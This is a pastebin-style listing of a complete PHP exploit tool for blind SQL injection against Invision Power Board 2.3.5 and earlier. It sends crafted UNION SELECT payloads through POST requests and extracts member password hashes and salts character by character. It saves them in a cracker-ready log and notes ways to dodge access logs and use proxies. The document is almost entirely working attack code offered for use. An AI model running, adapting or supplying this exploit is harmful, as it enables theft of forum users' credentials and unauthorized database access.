Joker0day

Default IP.Board <= 2.3.5 Blind SQL Injection Tool [PHP]

Jul 22nd, 2018
  1. <?php
// Surface every notice: the dump runs unattended for a long time, and a silently
// undefined variable (see the $id_end handling below) would just make the main
// loop do nothing without any hint why.
error_reporting(E_ALL);
  3. ///////////////////////////////////////////////////////////////////////
  4. ///////////////////////////////////////////////////////////////////////
  5. // IPB <= 2.3.5 sql injection exploit
  6. // Version 1.3
  7. // written by Wareaxe
  8. // Modded by Affix
  9. // http://Root-The.NET
  10. // based on DarkFig's advisory
  11. // http://acid-root.new.fr/?0:18
  12. //
  13. // FEATURES:
  14. // 1. Fetching algorithm optimized for speed
  15. // 2. Attack goes through $_POST, so the payload does not show up in default web-server access logs (the requests themselves still do, and application or WAF logging can capture POST bodies)
  16. // 3. Command Line Argument Interface
  17. // 4. Select from and to User IDs
  18. // 5. Pretesting saves time if IPB is not vulnerable
  19. // 6. curl extension autoloading (this listing contains no such loader: make_post() calls curl_init() directly, so the curl extension must already be loaded)
  20. // 7. can work with multiple ID-s
  21. // 8. log format compatible with passwordspro
  22. ///////////////////////////////////////////////////////////////////////
  23. //================================================== ===================
  24.  
  25. print("RTN IPB <= 2.3.5 Blind SQL Injection Tool \n");
  26. print("Coded by Waraxe Modded by Affix \n");
  27.  
  28. if(!isset($_SERVER['argv'][1]))
  29. {
  30. die("\n\nUsage php -f " . $_SERVER['argv'][0] . " http://site.com/ <start> <end> <prefix>\n\n");
  31. }
  32. $url = $_SERVER['argv'][1];
  33. if(!isset($_SERVER['argv'][2]))
  34. {
  35. print("Start and End ID Not Set using 1 and 10 as DEFAULT");
  36. $id_start = 1;// starting user ID, default value "1" is admin's ID
  37. if(!isset($_SERVER['argv'][3])){
  38. $id_end = $id_start + 10;// ending user ID
  39. }
  40. }
  41. else
  42. {
  43. $id_start = $_SERVER['argv'][2];
  44. $id_end = $_SERVER['argv'][3];
  45. }
  46.  
  47. if(!isset($_SERVER['argv'][4]))
  48. {
  49. print("Prefix not set reverting to default (ibf_)\n");
  50. $prefix = 'ibf_';// IPB table prefix, default is "ibf_"
  51. }
  52. else
  53. {
  54. $prefix = $_SERVER['argv'][4];
  55. }
  56.  
  57. # Proxy settings
  58. # Be sure to use proxy
  59. //$proxy_ip_port = '127.0.0.1:8118';
  60. //$proxy_user_password = 'someuseromepassword';
  61. $outfile = './ipblog.txt';// Log file
  62. //================================================== ====================
  63. ///////////////////////////////////////////////////////////////////////
  64. // Don't mess below this line, unless you know the stuff
  65. ///////////////////////////////////////////////////////////////////////
  66. //================================================== ===================
  67. ///////////////////////////////////////////////////////////////////////
  68.  
  69. //================================================== ===================
  70. $cli = php_sapi_name() === 'cli';
  71. //================================================== ===================
  72. // Warning, if executed from webserver
  73. //================================================== ===================
  74. if(!$cli)
  75. {
  76. if(!isset($_REQUEST['wtf-is-cli']))
  77. {
  78. echo "<html><head><title>Attention!</title></head>\n";
  79. echo "<body><br /><br /><center>\n";
  80. echo "<h1>Warning!</h1>\n";
  81. echo "This exploit is meant to be used as php CLI script!<br />\n";
  82. echo "More information:<br />\n";
  83. echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
  84. echo "Still, you can try to run it from webserver.<br />\n";
  85. echo "Just press the button below and prepare for long waiting<br />\n";
  86. echo "And learn to use php CLI next time, please ...<br />\n";
  87. echo "<form method=\"get\">\n";
  88. echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
  89. echo "</form>\n";
  90. echo "</center></body></html>\n";
  91. exit;
  92. }
  93. else
  94. {
  95. // Let's try to maximize our chances without CLI
  96. @set_time_limit(0);
  97. }
  98. }
  99. //================================================== ===================
  100. xecho("Target: $url\n");
  101. xecho("Sql table prefix: $prefix\n");
  102. xecho("Testing target URL ... \n");
  103. test_target_url();
  104. xecho("Target URL seems to be valid\n");
  105. add_line("Target: $url");
  106.  
  107. for($i = $id_start; $i <= $id_end; $i ++)
  108. {
  109. echo "Testing ID $i\n";
  110. if(!test_target_id($i))
  111. {
  112. echo "ID $i not valid, passing ...\n";
  113. continue;
  114. }
  115. echo "ID $i validated\n";
  116.  
  117. $hash = get_hash($i);
  118. $salt = get_salt($i);
  119. $line = "$i:$hash:$salt";
  120. add_line($line);
  121.  
  122. xecho("\n------------------------------------------\n");
  123. xecho("User ID: $i\n");
  124. xecho("Hash: $hash\n");
  125. xecho("Salt: $salt");
  126. xecho("\n------------------------------------------\n");
  127. }
  128.  
  129. add_line("------------------------------------------");
  130.  
  131. xecho("\nQuestions and feedback - http://www.waraxe.us/ ~ http://belegit.org \n");
  132. die("See ya!  \n");
  133. //////////////////////////////////////////////////////////////////////
  134. //////////////////////////////////////////////////////////////////////
  135. function test_target_url()
  136. {
  137. global $url;
  138.  
  139. $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
  140. $buff = trim(make_post($url, $post, '', $url));
  141.  
  142. if($buff === 'notfound')
  143. {
  144. die("Target is patched? Exiting ...\n");
  145. }
  146.  
  147. if($buff !== 'found')
  148. {
  149. print("Invalid response, target URL not valid? Exiting ... \n\n");
  150. die();
  151. }
  152. }
  153. //////////////////////////////////////////////////////////////////////
  154. function test_target_id($id)
  155. {
  156. global $url, $prefix;
  157.  
  158. $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
  159.  
  160. return test_condition($post);
  161. }
  162. ///////////////////////////////////////////////////////////////////////
  163. function get_salt($id)
  164. {
  165. $len = 5;
  166. $out = '';
  167.  
  168. xecho("Finding salt ...\n");
  169.  
  170. for($i = 1; $i < $len + 1; $i ++)
  171. {
  172. $ch = get_saltchar($i, $id);
  173. xecho("Got pos $i --> $ch\n");
  174. $out .= "$ch";
  175. xecho("Current salt: $out \n");
  176. }
  177.  
  178. xecho("\nFinal salt for ID $id: $out\n\n");
  179.  
  180. return $out;
  181. }
  182. ///////////////////////////////////////////////////////////////////////
  183. function get_saltchar($pos, $id)
  184. {
  185. global $prefix;
  186.  
  187. $char = '';
  188. $min = 32;
  189. $max = 128;
  190. $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
  191. $curr = 0;
  192.  
  193. while(1)
  194. {
  195. $area = $max - $min;
  196. if($area < 2 )
  197. {
  198. $post = $pattern . "=$max";
  199. $eq = test_condition($post);
  200.  
  201. if($eq)
  202. {
  203. $char = chr($max);
  204. }
  205. else
  206. {
  207. $char = chr($min);
  208. }
  209.  
  210. break;
  211. }
  212.  
  213. $half = intval(floor($area / 2));
  214. $curr = $min + $half;
  215.  
  216. $post = $pattern . '%253e' . $curr;
  217.  
  218. $bigger = test_condition($post);
  219.  
  220. if($bigger)
  221. {
  222. $min = $curr;
  223. }
  224. else
  225. {
  226. $max = $curr;
  227. }
  228.  
  229. xecho("Current test: $curr-$max-$min\n");
  230. }
  231.  
  232. return $char;
  233. }
  234. ///////////////////////////////////////////////////////////////////////
  235. function get_hash($id)
  236. {
  237. $len = 32;
  238. $out = '';
  239.  
  240. xecho("Finding hash ...\n");
  241.  
  242. for($i = 1; $i < $len + 1; $i ++)
  243. {
  244. $ch = get_hashchar($i, $id);
  245. xecho("Got pos $i --> $ch\n");
  246. $out .= "$ch";
  247. xecho("Current hash: $out \n");
  248. }
  249.  
  250. xecho("\nFinal hash for ID $id: $out\n\n");
  251.  
  252. return $out;
  253. }
  254. ///////////////////////////////////////////////////////////////////////
  255. function get_hashchar($pos, $id)
  256. {
  257. global $prefix;
  258.  
  259. $char = '';
  260. $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
  261.  
  262. // First let's determine, if it's number or letter
  263. $post = $pattern . '%253e57';
  264. $letter = test_condition($post);
  265.  
  266. if($letter)
  267. {
  268. $min = 97;
  269. $max = 102;
  270. xecho("Char to find is [a-f]\n");
  271. }
  272. else
  273. {
  274. $min = 48;
  275. $max = 57;
  276. xecho("Char to find is [0-9]\n");
  277. }
  278.  
  279. $curr = 0;
  280.  
  281. while(1)
  282. {
  283. $area = $max - $min;
  284. if($area < 2 )
  285. {
  286. $post = $pattern . "=$max";
  287. $eq = test_condition($post);
  288.  
  289. if($eq)
  290. {
  291. $char = chr($max);
  292. }
  293. else
  294. {
  295. $char = chr($min);
  296. }
  297.  
  298. break;
  299. }
  300.  
  301. $half = intval(floor($area / 2));
  302. $curr = $min + $half;
  303.  
  304. $post = $pattern . '%253e' . $curr;
  305.  
  306. $bigger = test_condition($post);
  307.  
  308. if($bigger)
  309. {
  310. $min = $curr;
  311. }
  312. else
  313. {
  314. $max = $curr;
  315. }
  316.  
  317. xecho("Current test: $curr-$max-$min\n");
  318. }
  319.  
  320. return $char;
  321. }
  322. ///////////////////////////////////////////////////////////////////////
  323. function test_condition($p)
  324. {
  325. global $url;
  326.  
  327. $bret = false;
  328. $maxtry = 10;
  329. $try = 1;
  330.  
  331. $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
  332. $post = sprintf($pattern, $p);
  333.  
  334. while(1)
  335. {
  336. $buff = trim(make_post($url, $post, '', $url));
  337.  
  338. if($buff === 'found')
  339. {
  340. $bret = true;
  341. break;
  342. }
  343. elseif($buff === 'notfound')
  344. {
  345. break;
  346. }
  347. elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
  348. {
  349. die("Sql error! Wrong prefix?\nExiting ... ");
  350. }
  351. else
  352. {
  353. xecho("test_condition() - try $try - invalid return value ...\n");
  354. $try ++;
  355. if($try > $maxtry)
  356. {
  357. die("Too many tries - exiting ...\n");
  358. }
  359. else
  360. {
  361. xecho("Trying again - try $try ...\n");
  362. }
  363. }
  364. }
  365.  
  366. return $bret;
  367. }
  368. ///////////////////////////////////////////////////////////////////////
  369. function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
  370. {
  371. $ch = curl_init();
  372. $timeout = 120;
  373. curl_setopt ($ch, CURLOPT_URL, $url);
  374. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  375. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  376. curl_setopt($ch, CURLOPT_POST, 1);
  377. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
  378. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  379. curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');
  380.  
  381. if(!empty($GLOBALS['proxy_ip_port']))
  382. {
  383. curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
  384.  
  385. if(!empty($GLOBALS['proxy_user_password']))
  386. {
  387. curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
  388. }
  389. }
  390.  
  391. if(!empty($cookie))
  392. {
  393. curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
  394. }
  395.  
  396. if(!empty($referer))
  397. {
  398. curl_setopt ($ch, CURLOPT_REFERER, $referer);
  399. }
  400.  
  401. if($headers === TRUE)
  402. {
  403. curl_setopt ($ch, CURLOPT_HEADER, TRUE);
  404. }
  405. else
  406. {
  407. curl_setopt ($ch, CURLOPT_HEADER, FALSE);
  408. }
  409.  
  410. $fc = curl_exec($ch);
  411. curl_close($ch);
  412.  
  413. return $fc;
  414. }
  415. ///////////////////////////////////////////////////////////////////////
  416. function add_line($line)
  417. {
  418. global $outfile;
  419.  
  420. $line .= "\n";
  421. $fh = fopen($outfile, 'ab');
  422. fwrite($fh, $line);
  423. fclose($fh);
  424.  
  425. }
  426. ///////////////////////////////////////////////////////////////////////
  427. function xecho($line)
  428. {
  429. if($GLOBALS['cli'])
  430. {
  431. echo "$line";
  432. }
  433. else
  434. {
  435. $line = nl2br(htmlspecialchars($line));
  436. echo "$line";
  437. }
  438. }
  439. //////////////////////////////////////////////////////////////////////
  440. ?>